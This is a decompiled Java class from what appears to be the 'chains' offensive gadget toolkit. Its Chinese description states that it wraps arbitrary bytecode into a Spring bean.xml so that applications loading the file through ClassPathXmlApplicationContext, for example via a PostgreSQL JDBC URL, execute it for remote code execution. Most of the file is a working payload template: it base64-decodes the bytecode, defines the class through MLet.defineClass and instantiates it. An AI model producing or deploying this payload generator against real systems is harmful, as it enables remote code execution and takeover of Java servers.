package com.ar3h.chains.gadget.impl.common.other;

import com.ar3h.chains.common.ContextTag;
import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.enums.Authors;
import com.ar3h.chains.common.util.CommonUtil;
import java.util.HashMap;
import org.apache.commons.codec.binary.Base64;
import org.springframework.web.context.support.XmlWebApplicationContext;

@GadgetAnnotation(name = "将字节码封装进spring bean.xml中，返回xml文件内容", alias = "sbxcl", description = "适用于ClassPathXmlApplicationContext加载xml文件场景，例如在PostgreSQL jdbc url利用，通过加载bean.xml文件实现字节码执行RCE", dependencies = {"spring-bean"}, authors = {Authors.xcxmiku}, priority = 20)
@GadgetTags(tags = {Tag.Other}, nextTags = {Tag.BytecodeConvertTag})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/common/other/SpringBeanXmlClassLoader.class */
public class SpringBeanXmlClassLoader implements Gadget {
    GadgetContext context;
    public static String template = "<beans xmlns=\"http://www.springframework.org/schema/beans\"\n       xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n       xsi:schemaLocation=\"http://www.springframework.org/schema/beans\n                           http://www.springframework.org/schema/beans/spring-beans.xsd\">\n    <bean id=\"decoder\" class=\"org.springframework.beans.factory.config.MethodInvokingFactoryBean\">\n        <property name=\"staticMethod\" value=\"javax.xml.bind.DatatypeConverter.parseBase64Binary\"/>\n        <property name=\"arguments\">\n            <list>\n                <value>%s</value>\n\n            </list>\n\n        </property>\n\n    </bean>\n\n    <bean id=\"classLoader\" class=\"javax.management.loading.MLet\"/>\n    <bean id=\"clazz\" factory-bean=\"classLoader\" factory-method=\"defineClass\">\n        <constructor-arg ref=\"decoder\"/>\n        <constructor-arg type=\"int\" value=\"0\"/>\n        <constructor-arg type=\"int\" value=\"%s\"/>\n    </bean>\n\n    <bean factory-bean=\"clazz\" factory-method=\"newInstance\"/>\n</beans>";

    public String getObject(byte[] bArr) {
        String format = String.format(template, Base64.encodeBase64String(bArr), Integer.valueOf(bArr.length));
        HashMap hashMap = new HashMap();
        hashMap.put(CommonUtil.getRandomString(10) + XmlWebApplicationContext.DEFAULT_CONFIG_LOCATION_SUFFIX, format.getBytes());
        this.context.put(ContextTag.CACHE_FILES_MAP, hashMap);
        return format;
    }

    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        this.context = gadgetContext;
        return getObject((byte[]) gadgetChain.doCreate(gadgetContext));
    }
}
